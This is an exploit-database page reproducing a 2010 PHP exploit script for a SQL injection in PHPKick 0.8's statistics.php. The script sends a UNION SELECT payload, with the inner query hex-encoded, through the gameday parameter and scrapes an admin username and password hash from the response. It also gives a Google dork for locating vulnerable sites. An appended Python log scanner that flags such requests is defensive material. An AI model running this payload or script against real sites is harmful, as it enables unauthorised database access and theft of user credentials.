PHPKick v0.8 statistics.php SQL Injection - exploit.company
vendor: PHPKick
by: garwga
N/A
CVSS
N/A
SQL Injection
Unknown
CWE
Product Name: PHPKick
Affected Version From: 0.8
Affected Version To: 0.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

PHPKick v0.8 statistics.php SQL Injection

This exploit allows an attacker to perform SQL injection on the statistics.php file in PHPKick v0.8. It works regardless of the PHP security settings, including magic_quotes and register_globals. This exploit is for educational purposes only and should not be used without permission. The exploit was found by garwga (ICQ#:453-144-667).

Mitigation:

Unknown

Exploit-DB raw data:

# Exploit Title: PHPKick v0.8 statistics.php SQL Injection
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : "© 2004 PHPKick.de Version 0.8"
# Category:  webapps/0day
# Code: see below
 
<?php
	echo"\n\n";
	echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
	echo"|                                                                            |\n";
	echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
	echo"|                                                                            |\n";
	echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
 
	echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
	echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
	echo"|      the owner of the webspace is illegal!                                 |\n";
	echo"|      I'm not responsible for any resulting damage                          |\n";
	echo"|                                                                            |\n";
	echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
	echo"|                                                                            |\n";
	echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
	echo"|============================================================================|\n\n\n";
 
 
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
	$host=$_SERVER['argv'][1];
	$path=$_SERVER['argv'][2];
    $spos=strpos($host, "http://");
  	if(!is_int($spos)&&($spos==0)){
	   $host="http://$host";
  	  }
	if(!$host=="http://localhost"){
	   $spos=strpos($host, "http://www.");
  	   if (!is_int($spos)&&($spos==0)){
	      $host="http://www.$host";
  	      }
	  }
	$exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
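	echo"exploiting...\n";
	// Fetch the page produced by the injected query.
	$source=file_get_contents($host.$path.$exploit);
	// Parse the returned HTML for a username and the hash that follows it after ':'.
	$username=GetBetween($source," :<br>",":");
	echo "username: $username\n";
	$hash=GetBetween($source,"<br>$username:","</td>");
	echo"hash: $hash\n";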
	}
else{
	echo"\n\n";
	echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
	echo"|                                                                            |\n";
	echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
	echo"|                                                                            |\n";
	echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
 
	echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
	echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
	echo"|      the owner of the webspace is illegal!                                 |\n";
	echo"|      I'm not responsible for any resulting damage                          |\n";
	echo"|                                                                            |\n";
	echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
	echo"|                                                                            |\n";
	echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
	echo"|============================================================================|\n";
}
function GetBetween($content,$start,$end){
    $r = explode($start, $content);
    if (isset($r[1])){
        $r = explode($end, $r[1]);
        return $r[0];
    }
    return '';
}
?>
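
Added example, not part of the original advisory or of the exploit author's code: a log check for the request shape the script above sends, namely statistics.php called with a gameday value that is not a plain integer and that carries a 0x hex literal (a way to pass a string without any quote characters). The log lines, the /kick/ path, the shortened hex literal and the assumption that gameday is normally a small non-negative integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the page). The second is shaped like the
# request the script sends, with a shortened hex literal in place of the original.
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Aug/2010:03:40:11 +0000] "GET /kick/statistics.php?action=overview&gameday=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [08/Aug/2010:03:45:02 +0000] "GET /kick/statistics.php?action=overview'
    '&gameday=-32%20union%20select%201,2,3,4,0x27206f7220313d31,6,7,8--%20f HTTP/1.0" 200 6230',
    '198.51.100.7 - - [08/Aug/2010:03:46:30 +0000] "GET /kick/index.php?page=0x41 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
HEX_LITERAL_RE = re.compile(r'0x((?:[0-9a-fA-F]{2})+)')
INT_RE = re.compile(r'\d{1,6}')  # assumption: a match day is a small non-negative integer


def decode_hex_literals(value):
    """Return the text carried in MySQL-style 0x.. literals (quote-free strings)."""
    return [bytes.fromhex(m.group(1)).decode('latin-1')
            for m in HEX_LITERAL_RE.finditer(value)]


def scan(lines, script='statistics.php', param='gameday'):
    """Flag requests to `script` whose `param` is not a plain integer."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a recognisable request line
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith('/' + script):
            continue
        # parse_qs percent-decodes, so %20 becomes a space before the check
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not INT_RE.fullmatch(value):
                findings.append({'client': client, 'value': value,
                                 'hidden': decode_hex_literals(value)})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f['client'], repr(f['value']), f['hidden'])
```

The same integer-only rule is what the application itself should enforce on gameday before the value reaches any query.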